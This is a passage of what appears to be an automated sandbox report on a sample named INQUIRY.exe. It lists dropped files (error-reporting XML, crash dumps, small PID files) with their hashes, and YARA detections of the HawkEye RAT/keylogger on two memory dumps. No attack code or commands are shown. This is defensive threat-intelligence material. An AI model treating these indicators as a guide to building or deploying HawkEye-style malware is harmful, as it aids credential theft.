                                                                      Size (bytes):5644
                                                                      Entropy (8bit):3.725672845251971
                                                                      Encrypted:false
                                                                      SSDEEP:96:RtIU6o7r3GLt3i4W6hn/OY6TYZtuvUubSfaQgsB+aM1jM1fohm:Rrl7r3GLNi4W6h/OlTYZtuvUubS7+p1k
                                                                      MD5:0EF540DE4DBDF43FBCFEE50AB55FA136
                                                                      SHA1:7ECED9AE0FCF5AAC17BF09D4114C09D2285FC38E
                                                                      SHA-256:8DAEF505D2FE71360A1544D35C3E1ACBE7AE5A4EFF9617AC844B591E55E9DCB1
                                                                      SHA-512:9C771D8C01F602E3732F32990596ED9C8E833AF86C91F507D402CF14B1E5DEBEE53BA9CED202C1BB40F667B4DDB904AB419A4387464F30E5F72D93F60D639D4D
                                                                      Malicious:false
                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.3.6.4.<./.P.i.d.>.......
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER6389.tmp.xml
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):4609
                                                                      Entropy (8bit):4.456846137432615
                                                                      Encrypted:false
                                                                      SSDEEP:48:cvIwSD8zsUJgtWI9OK6oWSC8B48fm8M4JFKg7F98+q8v5epJP6v4Hdd:uITfS4aSN3JFKDKovP6vMdd
                                                                      MD5:2ABC6F088DE2C790C718E4B5C042A11F
                                                                      SHA1:663A6B84DE9F3B0284CB8F8F56F68836D59199BA
                                                                      SHA-256:B78C0C1912AF53D5A3855576A4F1759E27E916D0CDDEA8F9ECD6B179302BB31D
                                                                      SHA-512:2145C163BEF734A90F38DB9ABF56E6EDA5BB1E3CE77AC22F5ABE411C4E98191C4DC8B68588BEE18AA157139F546DECF73A2322C7C2326BFDF2870B94A3638C26
                                                                      Malicious:false
                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="734354" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:Mini DuMP crash report, 14 streams, Wed Nov 18 14:03:43 2020, 0x60521 type
                                                                      Category:dropped
                                                                      Size (bytes):7022802
                                                                      Entropy (8bit):4.717144579527239
                                                                      Encrypted:false
                                                                      SSDEEP:98304:XYPlBtHP569HBpwU1r+VTnb1XaFA8nPtYT3bMriGfjTsXDaIoUL8Md:X6Btx69HAV4YQhfsXb
                                                                      MD5:FEAD06C9C1479F402088C5790CB54810
                                                                      SHA1:98E6C5DBB08872323131736E654FA53615B587B4
                                                                      SHA-256:E5C77118B53DF48454D8706ADB3AA5E603848B19056510A90343E9C8229EEBC6
                                                                      SHA-512:BC34879B56421682EF50B6B1EAA7D8CE9D3120567037B8213FC36ACCAB9218CE55125A98552CF3ED34CA2D1E7D98D8F107C0F286F2345EB138C9C351491C32A4
                                                                      Malicious:true
                                                                      Yara Hits:
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, Author: JPCERT/CC Incident Response Group
                                                                      Preview: MDMP....... ........)._!..................U...........B.......8......GenuineIntelW...........T.......T....)._.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER8867.tmp.WERInternalMetadata.xml
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):6324
                                                                      Entropy (8bit):3.732480537668084
                                                                      Encrypted:false
                                                                      SSDEEP:192:Rrl7r3GLNi4Z6mY0uuS8+prI89bkcsfrsm:RrlsNi+6mYPuSFkvf1
                                                                      MD5:443C182B00527E31B1E4AD64BFFA8241
                                                                      SHA1:F1D745B2744B4224FD43AE752DAA83B8E7FB10E8
                                                                      SHA-256:25D2AD246A4ACEB2DBF6DD75A5DD3B06CC824F525D990939B860A4E259E71E64
                                                                      SHA-512:36978C6151C7001BF4AF5C4D7AB4510EADD05EB048E435BD1C1A61809B4003CB2F6D5AE7F6C9074952C5C121C793F337EF2886D30FE662B18BA622FFE1E1E029
                                                                      Malicious:false
                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.3.6.4.<./.P.i.d.>.......
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER8933.tmp.xml
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):4587
                                                                      Entropy (8bit):4.5076470925802195
                                                                      Encrypted:false
                                                                      SSDEEP:48:cvIwSD8zsUJgtWI9OK6oWSC8Bn8fm8M4JOWjZFz+q89z8pJP6v4Hud:uITfS4aSN+JOgns8vP6vMud
                                                                      MD5:52FC903ED30F5B61BA8F727424907241
                                                                      SHA1:40816AF32399226225A46FA9841CC819A894B75A
                                                                      SHA-256:CD4FF732AB018C9AAC4D92F681006C0FB246283D3ADC6A040F8CA7B31F48FF38
                                                                      SHA-512:51706A5090F26418194DFC10146F7D906A7E4E203FFDBE7BFB1FDE179C53FAE6B32AE0134F083A50E07B78FA3B020A968C9CA773CCA4A45A8FEB8AEC48BAAC8B
                                                                      Malicious:false
                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="734354" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER89A3.tmp.WERInternalMetadata.xml
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):5644
                                                                      Entropy (8bit):3.727574879681056
                                                                      Encrypted:false
                                                                      SSDEEP:96:RtIU6o7r3GLt3iGQA6pOPYZtuvUubSfaQgsB+aM1YC1fYAUom:Rrl7r3GLNiG/6pAYZtuvUubS7+p1YC1S
                                                                      MD5:B3060F69B30CC0B7BE8A0EEBBC0F66AE
                                                                      SHA1:14ED5EC297764359163C1F4AF27BA5D9CD96F73B
                                                                      SHA-256:E42AE8026F9C077C31416C917B6B9EBE48907C17E9D392B0B900FA94CB1F7121
                                                                      SHA-512:514FE1126AF8F28F5A2E99DD6D8B441CC185879EF3FC73AEE025356DDCA920109D43E26E994BC43E62AB9A15A0181FFDCA346ACE6F14CC4ED7A1B5B915B25D2D
                                                                      Malicious:false
                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.0.8.<./.P.i.d.>.......
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER8B0B.tmp.xml
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):4609
                                                                      Entropy (8bit):4.456792166327963
                                                                      Encrypted:false
                                                                      SSDEEP:48:cvIwSD8zsBJgtWI9OK6oWSC8BN8fm8M4JFKg7Fi+q8v5mpJP6v4HcHOd:uITfT4aSNwJFK7K0vP6vMiOd
                                                                      MD5:18F66061D1D492E5837EDA572C603EF7
                                                                      SHA1:09D9099E03FF5F8A1A481E9C16C706253EF312C8
                                                                      SHA-256:40F6DA190C8F79EA3E49E49A4FF2165C43FDFA39C281EE54BEC83B22ABAD4810
                                                                      SHA-512:2D7BF15CE4CD127233CDF94E19D653B90D9E3CE4AA6DE49D145DC879CF3F7B4559D16F1D2B3118FAD5B7CE89279EB44B69F85F037D125FEB27E82BAAA80C3B97
                                                                      Malicious:false
                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="734353" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:Mini DuMP crash report, 14 streams, Wed Nov 18 14:02:53 2020, 0x60521 type
                                                                      Category:dropped
                                                                      Size (bytes):7023137
                                                                      Entropy (8bit):4.716145709461237
                                                                      Encrypted:false
                                                                      SSDEEP:98304:XYElKgNP5N9H5ZFx1r+VTJb1XacA8nLqYT3bXUyYjgtXSiqjoUt8MS:XbKgjN9HVsvVrttXS+
                                                                      MD5:727EDE66BE753BF43CC3BB8AD0424846
                                                                      SHA1:6D36C62C3F02AC08483F5C46ECAE760987320DCF
                                                                      SHA-256:790BA9AF55C3D758F27EF0D7863D6CB9A56EAFA041302FF6E05DD97CF97AC35F
                                                                      SHA-512:E96B87EEFC7CD22C841C78A61B34466AD208935E6ACAA741204F87FBBFCADA9B9EF12B6E3C4E9379491B5A6BEED83DA044D60F1774519197CFF5A50636035656
                                                                      Malicious:true
                                                                      Yara Hits:
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, Author: JPCERT/CC Incident Response Group
                                                                      Preview: MDMP....... ........)._!..................U...........B.......8......GenuineIntelW...........T...........z)._.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERC3AF.tmp.WERInternalMetadata.xml
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):6324
                                                                      Entropy (8bit):3.7341230330284576
                                                                      Encrypted:false
                                                                      SSDEEP:192:Rrl7r3GLNiGR6OjGY0uuS8+prm89bkasfCCsm:RrlsNiY6DYPuS/k5fCo
                                                                      MD5:5D356EEFFF6F12474642A2400398FCD4
                                                                      SHA1:51D9FB907FDCABE46A83942DF50444C241FC8F63
                                                                      SHA-256:53E30E0481710B622CD95CFADFD2017035084D91E8EFDF6D2BF3EEDF642EF4F5
                                                                      SHA-512:B33ACA3565A56D25A75FB3D09CF4E818502C92DA36C13E3277076147DC05F9D9BEF1AAFFCD81E0A2F4831560579BAB3E2688DCB4EC723064BA3576CBEF39A17E
                                                                      Malicious:false
                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.0.8.<./.P.i.d.>.......
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERC6FC.tmp.xml
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):4587
                                                                      Entropy (8bit):4.511253263073843
                                                                      Encrypted:false
                                                                      SSDEEP:48:cvIwSD8zsBJgtWI9OK6oWSC8BF8fm8M4JOWjZFI+q89zApJP6v4HcHdd:uITfT4aSNkJOgEsAvP6vMidd
                                                                      MD5:4433E23608B8B2A3855C267846E81EA3
                                                                      SHA1:20A828E188264B443EC9BF44921A81DADFD4B472
                                                                      SHA-256:9632AC9115185AB53965AF43D06F0E22DC58CA6013D9DC82F82F636370757E73
                                                                      SHA-512:14C33EF3DA14C74ECEF7CDF5F79CA7C7F89415E714E06A2A5AC643B10BCE2714A44370694F8A69FC241D9547D50101F973E37CB27121CC454DD6865C33B7F751
                                                                      Malicious:false
                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="734353" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WEREF38.tmp.WERInternalMetadata.xml
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):7616
                                                                      Entropy (8bit):3.691270032301233
                                                                      Encrypted:false
                                                                      SSDEEP:192:Rrl7r3GLNiin6E6YPb6EgmfZtuvUubS7+p1ct1fAldUm:RrlsNia6E6Yj6EgmfSvvbSecvfer
                                                                      MD5:ACACA69C6A291286C08D46EDABFF5680
                                                                      SHA1:D7B1662B910D8FD7961E37DB9E444921E4639EA4
                                                                      SHA-256:8EEB4DDDCF0548A987BD4BF9FE0C06E0B2C14C390D2F0F99C49CD1C5C541F745
                                                                      SHA-512:A9EB6EE1080F61332325FA1A47A26C6351A3A070B88DDBBE280D70D3C6BE4BE18E3063E83954C8949A6236C251A3B2BD52CA3176A609F3F4C916890330EDEA01
                                                                      Malicious:false
                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.8.9.6.<./.P.i.d.>.......
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WEREFF4.tmp.xml
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):4609
                                                                      Entropy (8bit):4.455540365553958
                                                                      Encrypted:false
                                                                      SSDEEP:48:cvIwSD8zs6JgtWI9OK6oWSC8Bv8fm8M4JFKg7Fflm+q8v5UpJP6v4Hwd:uITfI4aSNCJFKcIKGvP6vMwd
                                                                      MD5:DF582E1905AE5003E6954E4AD881502D
                                                                      SHA1:CA58F2D441FEA0F0EDB1918239EA99A9E579DE90
                                                                      SHA-256:DA6CA008EF7A7B3630E4B663CB2A6E8CE38BCC4E32E7E416950FAB100EA1F2FB
                                                                      SHA-512:5BC1A1740FC49FB50052C08845A89BFC11D4B87A83AA0B5BFEFC4682A1F9C36F7F26548BF608BF22B78BE23A721C9620E4B2A1D917BF588FF7A2DBE285F716CF
                                                                      Malicious:false
                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="734352" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                      C:\Users\user\AppData\Local\Temp\holderwb.txt
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                      File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):2
                                                                      Entropy (8bit):1.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:Qn:Qn
                                                                      MD5:F3B25701FE362EC84616A93A45CE9998
                                                                      SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                      SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                      SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                      Malicious:false
                                                                      Preview: ..
                                                                      C:\Users\user\AppData\Roaming\pid.txt
                                                                      Process:C:\Users\user\Desktop\INQUIRY.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):4
                                                                      Entropy (8bit):2.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:Pd:F
                                                                      MD5:EFFC299A1ADDB07E7089F9B269C31F2F
                                                                      SHA1:6AFB24DE207D2E6952BA43F0E5B20BCDF0596CE5
                                                                      SHA-256:50E9A8665B62C8D68BCCC77C7C92431A1AA26CCBD38ED4BBA8DD7422A3A4AB70
                                                                      SHA-512:BD27269F95DA0217EE0999E12CC2AFC05882C559D55C1660095BB38A7D96ECB5F8210A919B24069C3FCC17CCDAA13844A75948314C74AAAC63B082DF196EA818
                                                                      Malicious:false
                                                                      Preview: 1364
                                                                      C:\Users\user\AppData\Roaming\pidloc.txt
                                                                      Process:C:\Users\user\Desktop\INQUIRY.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):34
                                                                      Entropy (8bit):4.0989440037669045
                                                                      Encrypted:false
                                                                      SSDEEP:3:oNt+WfWsrmC:oNwvsr7
                                                                      MD5:4FA80C1B433C83F339F774D6347C74D8
                                                                      SHA1:B5F7CA62EFB43F9A32A112C991CE22C07A8908D2
